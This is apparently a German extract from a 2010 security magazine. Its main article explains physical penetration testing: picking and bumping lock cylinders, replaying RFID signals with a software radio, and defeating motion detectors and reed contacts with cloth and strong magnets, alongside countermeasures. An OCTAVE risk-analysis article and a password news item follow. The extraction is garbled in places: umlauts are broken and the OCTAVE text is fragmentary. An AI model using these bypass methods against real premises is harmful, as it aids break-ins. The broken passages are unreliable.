Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
